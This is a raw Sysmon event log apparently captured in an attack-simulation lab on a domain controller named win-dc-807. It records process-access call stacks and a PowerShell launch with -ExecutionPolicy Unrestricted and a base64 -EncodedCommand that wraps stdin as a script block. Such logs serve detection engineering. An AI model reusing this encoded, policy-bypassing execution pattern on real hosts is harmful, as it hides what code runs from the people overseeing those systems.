15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003727Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003726Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CB0-5FA1-BA00-000000008801}2720C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003725Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7CB0-5FA1-B900-000000008801}43485092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CB0-5FA1-BA00-000000008801}2720C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319332ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dbaca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dba279(wow64) 154100x80000000000000003724Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.533{D28789B6-7CB0-5FA1-BA00-000000008801}2720C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003723Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.515{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003722Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.515{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003721Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.515{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003720Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.468{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003719Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.468{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003718Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.421{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mzsjhg0v.2zu.ps12020-11-03 15:52:16.421 10341000x80000000000000003717Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.421{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003716Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003715Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003713Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003712Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003711Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003710Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003709Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003708Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003707Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 